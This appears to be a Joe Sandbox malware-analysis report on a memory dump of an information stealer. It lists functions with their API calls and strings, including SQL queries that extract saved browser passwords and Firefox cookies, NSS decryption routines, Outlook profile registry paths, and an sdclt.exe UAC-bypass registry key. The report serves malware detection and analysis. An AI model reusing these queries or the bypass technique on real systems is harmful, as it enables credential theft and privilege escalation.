Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
API String ID: 410702425-850564384
Opcode ID: 4229948dc4aee5da2f4df1bd062441ef5343d7e50ac5b06cd9b84578c9b69f71
Instruction ID: 9275c4eac57f83401b5bfd44fe5bce5e0d50566109a7480f7ac9b4a3bc5b877b
Opcode Fuzzy Hash: 4229948dc4aee5da2f4df1bd062441ef5343d7e50ac5b06cd9b84578c9b69f71
Instruction Fuzzy Hash: BD917D71A00109ABCB04FFB1D852AEEB774BF44304F50853BE61A771D1DB386A65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB4B Relevance: 46.0, APIs: 23, Strings: 3, Instructions: 479stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

Part of subcall function 004044C4: EntryPoint.DBKYOVYK(0000000A,?,75A901C0,?,?,?,?,?,?,?,?,?,?,00414F10,?,75A901C0), ref: 004044DB

Part of subcall function 004042C5: lstrcatW.KERNEL32(00000000,75A901C0), ref: 004042F5

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,.tmp,00000000,004194E4,.tmp,00000000,004194E4,?,?,00000000), ref: 0040FC46
PathFileExistsW.SHLWAPI(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FC5D
CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 0040FC72
CopyFileW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0040FC86
lstrlenW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FC9E
lstrcpyW.KERNEL32(00000000,00000000), ref: 0040FCB5
lstrlenW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FCD0
WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0040FCE5
lstrlenW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00410100), ref: 0040FCFA
lstrcpyW.KERNEL32(00000000,00000000), ref: 0040FD7A

Part of subcall function 004108A6: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,00000000), ref: 00410938
Part of subcall function 004108A6: BCryptDecrypt.BCRYPT(00000000,0000000C,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410966
Part of subcall function 004108A6: EntryPoint.DBKYOVYK(00000001), ref: 00410979
Part of subcall function 004108A6: LocalFree.KERNEL32(0040FF12), ref: 004109EE

lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040FF46
lstrlenA.KERNEL32(?,00000000,00000000), ref: 0040FF5C
lstrlenA.KERNEL32(00000000), ref: 0040FF7D
lstrlenA.KERNEL32(00000000), ref: 0040FFAF
lstrlenA.KERNEL32(?), ref: 0040FFE1
lstrlenW.KERNEL32(00000000,?,?,00000000), ref: 0041008C
lstrcpyW.KERNEL32(00000000,00000000), ref: 004100A2
lstrlenW.KERNEL32(?,?,?,00000000), ref: 004100B7
lstrlenW.KERNEL32(00000000), ref: 0040FD64

Part of subcall function 00406F2C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0040467B,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 00406F36

lstrlenW.KERNEL32(?), ref: 0040FD8F
lstrcpyW.KERNEL32(00000000,?), ref: 0040FDA5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0040FD13

Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404358
Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404365
Part of subcall function 0040434F: lstrcpyA.KERNEL32(00000000,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404378

Part of subcall function 0040415D: lstrcatA.KERNEL32(00000000,75A901C0,?,00000000,?,004045D8,00000000,00000000,?,00405EA3,?,?,?,?,?), ref: 00404189

lstrcpyW.KERNEL32(00000000,?), ref: 004100CD

Strings

select signon_realm, origin_url, username_value, password_value from wow_logins, xrefs: 0040FE16
.tmp, xrefs: 0040FB96, 0040FB9E, 0040FBD4
select signon_realm, origin_url, username_value, password_value from logins, xrefs: 0040FE1E, 0040FE28

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$File$Path$AllocByteCharCopyEntryExistsFreeLocalMultiPointVirtualWidelstrcat$CryptDecryptFolderSpecial
String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
API String ID: 1750137145-3832748974
Opcode ID: ccddf561eaefe28c1e2a9810541cb1a5cec08a209bf266524ecb8cbcb6a4ad1c
Instruction ID: e3fe1af86889dfa9c784eb98c334902073b2a5f0eb86767160a3a4b7c37b02ae
Opcode Fuzzy Hash: ccddf561eaefe28c1e2a9810541cb1a5cec08a209bf266524ecb8cbcb6a4ad1c
Instruction Fuzzy Hash: 9C023171A0020AABDB15EFA1EC95AEE7B78AF44304F10403EF516B72D1DB789D54CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415974 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 161sleepstringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00413893: GetCurrentProcess.KERNEL32(00000008,00000000,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138A5
Part of subcall function 00413893: OpenProcessToken.ADVAPI32(00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138AC
Part of subcall function 00413893: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138CA
Part of subcall function 00413893: FindCloseChangeNotification.KERNEL32(00000000,?,75A901C0), ref: 004138DF

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

Part of subcall function 00413960: EntryPoint.DBKYOVYK(000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 0041396D
Part of subcall function 00413960: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610), ref: 00413981

CharLowerW.USER32(?,\Documents:ApplicationData,?,00000000), ref: 004159B3
CharLowerW.USER32(00000000), ref: 004159BA
lstrcmpW.KERNEL32(00000000,00000000), ref: 004159BE
CloseHandle.KERNEL32 ref: 004159EB
GetCurrentProcess.KERNEL32(00000000), ref: 004159F6
IsWow64Process.KERNEL32(00000000), ref: 004159FD
GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 00415A34
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00415A66
lstrcatW.KERNEL32(?,\sdclt.exe), ref: 00415A78
GetLastError.KERNEL32 ref: 00415A7E
Sleep.KERNEL32(00004E20), ref: 00415AEA
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00415B05
CloseHandle.KERNEL32(?), ref: 00415B0E

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

CloseHandle.KERNEL32(?), ref: 00415B13
wsprintfW.USER32 ref: 00415B25
TerminateProcess.KERNEL32(?,00000000), ref: 00415B32
Sleep.KERNEL32(000007D0), ref: 00415B4A
RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00415B56
ExitProcess.KERNEL32 ref: 00415B5D

Strings

Software\Classes\Folder\shell\open\command, xrefs: 00415B4C
cmd.exe /C C:\Windows\System32\sdclt.exe, xrefs: 00415AC5
DelegateExecute, xrefs: 00415A4D
\Documents:ApplicationData, xrefs: 00415995
\sdclt.exe, xrefs: 00415A6C

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Process$Close$Handle$CharCurrentFileLowerModuleNameSleepToken$ChangeCreateDeleteDirectoryEntryErrorExitFindFolderFreeInformationLastNotificationOpenPathPointSpecialSystemTerminateVirtualWow64lstrcatlstrcmpwsprintf
String ID: DelegateExecute$Software\Classes\Folder\shell\open\command$\Documents:ApplicationData$\sdclt.exe$cmd.exe /C C:\Windows\System32\sdclt.exe
API String ID: 570025781-3589134996
Opcode ID: 768319a5d4c2a506b057d0c436ffcda7a7e028bb714fda299a32ba95c6a1839b
Instruction ID: c8e163cec729b41f9d376fd4317b3f752254e181f9c37d056650d5e081c8f94b
Opcode Fuzzy Hash: 768319a5d4c2a506b057d0c436ffcda7a7e028bb714fda299a32ba95c6a1839b
Instruction Fuzzy Hash: A5518E72D00119BBDB11EBA1DC89EDE7B79EF84704F0004AAF505B60A1DB785F84CE69

Uniqueness

Uniqueness Score: -1.00%

Function 0041280C Relevance: 34.7, APIs: 23, Instructions: 184pipethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00412798: GetCurrentThreadId.KERNEL32 ref: 004127A5
Part of subcall function 00412798: SetEvent.KERNEL32(00000000), ref: 004127B9
Part of subcall function 00412798: WaitForSingleObject.KERNEL32(0041E56C,00001388), ref: 004127C6
Part of subcall function 00412798: TerminateThread.KERNEL32(0041E56C,000000FE), ref: 004127D7

CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,00000000), ref: 00412850
GetCurrentProcess.KERNEL32(?,00000000), ref: 00412864
GetCurrentProcess.KERNEL32(?,00000000), ref: 0041286F
DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000002,?,00000000), ref: 00412886
CreatePipe.KERNEL32(?,?,0000000C,00000000,?,00000000), ref: 004128A5
GetCurrentProcess.KERNEL32(?,00000000), ref: 004128B3
GetCurrentProcess.KERNEL32(?,00000000), ref: 004128BE
DuplicateHandle.KERNEL32(00000000,?,00000000,0041E560,00000000,00000000,00000002,?,00000000), ref: 004128D5
GetCurrentProcess.KERNEL32(?,00000000), ref: 004128E3
GetCurrentProcess.KERNEL32(?,00000000), ref: 004128EE
DuplicateHandle.KERNEL32(00000000,?,00000000,0041E564,00000000,00000000,00000002,?,00000000), ref: 00412905
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0041291C
CloseHandle.KERNEL32(?,?,00000000), ref: 0041292B
CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 00412958
CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 00412965
CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 00412972
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 0041297C
CreateThread.KERNEL32(00000000,00000000,004125EA,0041E558,00000000,0041E570), ref: 00412999
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004129BB
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004129C9
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004129D7
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004129E5
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004129F3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Handle$Close$Current$Process$Create$DuplicateThread$EventPipe$ObjectSingleTerminateWait
String ID:
API String ID: 1540801468-0
Opcode ID: 74d58b4cfb39bf8406edcbb327513fe11ed913bee22d9b2948a9c3803ae3f496
Instruction ID: 8dab836e936551f92e7d70f76fee8b3de35d471b0d6a122dec26a0c1661b454b
Opcode Fuzzy Hash: 74d58b4cfb39bf8406edcbb327513fe11ed913bee22d9b2948a9c3803ae3f496
Instruction Fuzzy Hash: 7E610AB5D00219FBDB119FA6CD59AEFBBB9EF84704F10416AE401B2250D7B44E90DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA2C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 208windowstringregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 0040BA3E
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,005520E8), ref: 0040BAA2
lstrcatW.KERNEL32(005520E8,\Microsoft Vision\), ref: 0040BABC
CreateDirectoryW.KERNEL32(005520E8,00000000), ref: 0040BAC8
lstrcpyW.KERNEL32(?,00552108), ref: 0040BB00
lstrcatW.KERNEL32(?,00419C98), ref: 0040BB13

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 00413C83: FindFirstFileW.KERNEL32(?,?,?), ref: 00413CB4
Part of subcall function 00413C83: lstrlenW.KERNEL32(?), ref: 00413D29
Part of subcall function 00413C83: lstrcpyW.KERNEL32(00000000,?), ref: 00413D3F
Part of subcall function 00413C83: FindNextFileW.KERNEL32(00000000,?), ref: 00413D6E

GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 0040BB93
wsprintfW.USER32 ref: 0040BBCA
CreateFileW.KERNEL32(34B40000,10000000,00000001,00000000,00000002,00000080,00000000,?,005520E8), ref: 0040BC08
CloseHandle.KERNEL32(00000000), ref: 0040BC18
RegisterClassW.USER32(?), ref: 0040BC37
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,?), ref: 0040BC4F
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040BC70
TranslateMessage.USER32(?), ref: 0040BC82
DispatchMessageA.USER32(?), ref: 0040BC8D
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040BC9D

Strings

ExplorerIdentifier, xrefs: 0040BB4A
\Microsoft Vision\, xrefs: 0040BAB6
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 0040BBC4

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Message$CreateFilelstrcpylstrlen$FindHandlelstrcat$ClassCloseDirectoryDispatchFirstFolderLocalModuleNextPathRegisterTimeTranslateWindowwsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
API String ID: 3119076778-2372768292
Opcode ID: 30093fdefd49251d36aa4b01437af304f5435eac285fa253cee858178261b458
Instruction ID: 26b75ce7244cb44e903b06c7f43956264ecf27c2e7acba2a1ddffc5055653a66
Opcode Fuzzy Hash: 30093fdefd49251d36aa4b01437af304f5435eac285fa253cee858178261b458
Instruction Fuzzy Hash: FF619072904314ABC710DFA5DC45EEBB7E8FB89704F40492EF649E3190DB38A944CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73A Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 0040C791
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 0040C7AE
lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 0040C801
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040C817
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040C84A
RegCloseKey.ADVAPI32(?), ref: 0040C85B
lstrcpyW.KERNEL32(?,?), ref: 0040C86F
lstrcatW.KERNEL32(?,004194E4), ref: 0040C87D
lstrcatW.KERNEL32(?,?), ref: 0040C891
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 0040C8AE
RegCloseKey.ADVAPI32(?,?), ref: 0040C8C3
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 0040C8E0

Strings

Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040C7C1, 0040C7D1
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040C787
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040C797
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040C7A4, 0040C7B4
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040C7DE, 0040C7E3, 0040C7F3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
API String ID: 1891545080-2020977430
Opcode ID: ad820082f498042192821a50b7890c95380bbfeced29ce75fef7fe675bc7051f
Instruction ID: 79542f49221bc805c3f6df51b0a484b91d4136f48a87925ae2317aa0f7e184d9
Opcode Fuzzy Hash: ad820082f498042192821a50b7890c95380bbfeced29ce75fef7fe675bc7051f
Instruction Fuzzy Hash: 4E411EB290021DFEEB20D7918C85EFB776CEB04784F1045B6B914F2141E6789E85EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFF2 Relevance: 31.9, APIs: 12, Strings: 6, Instructions: 396stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 00404477: wsprintfW.USER32 ref: 00404492

GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040F076
PathFileExistsW.SHLWAPI(?,\cookies.sqlite,?,?), ref: 0040F0A6
lstrlenW.KERNEL32(?), ref: 0040F0CD
WideCharToMultiByte.KERNEL32(00000000,00000200,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F0DF

Part of subcall function 00406F2C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0040467B,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 00406F36

lstrlenA.KERNEL32(00000000), ref: 0040F353
lstrlenA.KERNEL32(00000000), ref: 0040F383
lstrlenW.KERNEL32(?), ref: 0040F0F9

Part of subcall function 004040D5: MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,75A901C0,00000000,00000000,+E@,0040443F,?,+E@,-00000001,75A901C0), ref: 00404102
Part of subcall function 004040D5: EntryPoint.DBKYOVYK(00000000,?,0040452B,00000000,?,?,75A901C0,?), ref: 0040410D
Part of subcall function 004040D5: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,0040452B,00000000,?,?,75A901C0,?), ref: 0040412D

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F113
lstrlenA.KERNEL32(00000000), ref: 0040F2C0
lstrlenA.KERNEL32(00000000), ref: 0040F2D3
lstrlenA.KERNEL32(?), ref: 0040F2F0
lstrlenA.KERNEL32(?), ref: 0040F323

Strings

profiles.ini, xrefs: 0040F024
SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies, xrefs: 0040F164
Path, xrefs: 0040F06E
Profile, xrefs: 0040F031
\Mozilla\Firefox\, xrefs: 0040F00B
\cookies.sqlite, xrefs: 0040F097

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiWide$lstrcpy$PathVirtual$AllocEntryExistsFileFolderFreePointPrivateProfileSpecialStringwsprintf
String ID: Path$Profile$SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies$\Mozilla\Firefox\$\cookies.sqlite$profiles.ini
API String ID: 2217386904-1235532527
Opcode ID: d8b0436d83b6714f4bf9fc76cb6bd2e0fff147b4bed92869b07282d4aa3bfbc8
Instruction ID: 770a675fbdcea046b7cf6f8ded8a187acbdb90419ac110ac0ad54c90ca3a29e2
Opcode Fuzzy Hash: d8b0436d83b6714f4bf9fc76cb6bd2e0fff147b4bed92869b07282d4aa3bfbc8
Instruction Fuzzy Hash: 58E17D71900109ABDB14EFA1DC55AEEB7B4AF94704F10407EF912B72E1EB38AE44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C475 Relevance: 30.0, APIs: 1, Strings: 16, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0040820B: getaddrinfo.WS2_32(microsoft.com,00000000,?,?), ref: 0040824B
Part of subcall function 0040820B: socket.WS2_32(00000002,00000001,00000000), ref: 00408263
Part of subcall function 0040820B: htons.WS2_32(00000050), ref: 00408283
Part of subcall function 0040820B: freeaddrinfo.WS2_32(?), ref: 00408290
Part of subcall function 0040820B: WSAConnect.WS2_32(00000000,?,00000010,00000000,00000000,00000000,00000000), ref: 004082A1
Part of subcall function 0040820B: send.WS2_32(00000000,GET http://microsoft.com/ HTTP/1.1Host: microsoft.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Langu,0000016C,00000000), ref: 004082B8
Part of subcall function 0040820B: EntryPoint.DBKYOVYK(00000200), ref: 004082C3
Part of subcall function 0040820B: recv.WS2_32(00000000,00000000,00000200,00000000), ref: 004082D3
Part of subcall function 0040820B: closesocket.WS2_32(00000000), ref: 004082F0

Part of subcall function 00410170: LocalAlloc.KERNEL32(00000040,00000100,?,?), ref: 00410184
Part of subcall function 00410170: LocalFree.KERNEL32(00000000,?), ref: 004101D1

EntryPoint.DBKYOVYK(?,?,?), ref: 0040C5C8

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

Part of subcall function 004147A3: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74E2F770,00000000,?,?,?,?,0040AC91), ref: 004147CF

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Part of subcall function 0041473A: lstrcmpA.KERNEL32(?,E[A,?,74DF0F00,00415B45), ref: 00414773

Strings

sqlite3_column_int, xrefs: 0040C64E
sqlite3_column_count, xrefs: 0040C66E
sqlite3_prepare_v2, xrefs: 0040C62E
sqlite3_finalize, xrefs: 0040C6FE
sqlite3_column_bytes, xrefs: 0040C6DE
sqlite3_column_text, xrefs: 0040C63E
sqlite3_close, xrefs: 0040C61C
sqlite3_step, xrefs: 0040C68E
sqlite3_data_count, xrefs: 0040C67E
sqlite3_close_v2, xrefs: 0040C6EE
sqlite3_column_blob, xrefs: 0040C6BE
sqlite3_open_v2, xrefs: 0040C6AE
sqlite3_exec, xrefs: 0040C69E
sqlite3_open, xrefs: 0040C60F
sqlite3_column_type, xrefs: 0040C6CE
sqlite3_column_int64, xrefs: 0040C65E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$AllocEntryFreeLocalPointProcess$AllocateConnectVirtualclosesocketfreeaddrinfogetaddrinfohtonslstrcmprecvsendsocket
String ID: sqlite3_close$sqlite3_close_v2$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_count$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_column_type$sqlite3_data_count$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_open_v2$sqlite3_prepare_v2$sqlite3_step
API String ID: 3525366265-2370185430
Opcode ID: a35082ab786b2be1e9bdcc843e723a707b6c35561637e304c8583c367d53e484
Instruction ID: 922a60d9260966bb8e82de43c9da3af10763b6735acd4b0ab238954f03367c0f
